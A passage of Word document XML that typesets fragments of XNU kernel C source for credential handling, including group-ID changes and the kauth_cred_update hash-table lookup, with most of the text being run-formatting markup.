        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w: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 xml:space="preserve">cr_svgid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gi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 no change needed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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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Look up in cred hash table to see if we have a matching credential</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with the new values.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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bzero</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp_cre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sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp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uid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> u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ruid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> u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lastRenderedPageBreak/>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svuid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> u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flags </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pcred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cr_flags</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 inherit the opt-out of memberd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pcred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cr_flags </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRF_NOMEMBER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gmuid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> KAUTH_UID_NONE</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flags </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRF_NOMEMBER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else</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gmuid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> u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flags </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;=</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CRF_NOMEMBER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ngroups </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color w:val="008080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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 displacing a supplementary group opts us out of memberd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kauth_cred_change_egid</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gi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gmuid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> KAUTH_UID_NONE</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flags </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRF_NOMEMBER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rgid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> g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pcred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cr_svgid </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gi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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIG_MACF</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temp_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cr_label </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cr_label</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endif</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kauth_cred_update</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cre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amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TRUE</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0080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kauth_cred_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kauth_cred_update</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kauth_cred_t old_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kauth_cred_t model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boolean_t retain_auditinfo</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sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>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t found_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> new_cred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> NULL</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Make sure we carry the auditinfo forward to the new credential</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unless we are actually updating the auditinfo.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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retain_auditinfo</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bcopy</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>old_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cr_audit</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amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>model_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cr_audit</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>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sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>model_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cr_audit</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for</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nt</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     err</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HASH_LOCK</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found_cred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kauth_cred_find</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>model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found_cred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> old_cre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 same cred so just bail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HASH_UNLOCK</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>old_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>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lastRenderedPageBreak/>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found_cred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> NULL</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boolean_t destroy_it</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DEBUG_CRED_CHANGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
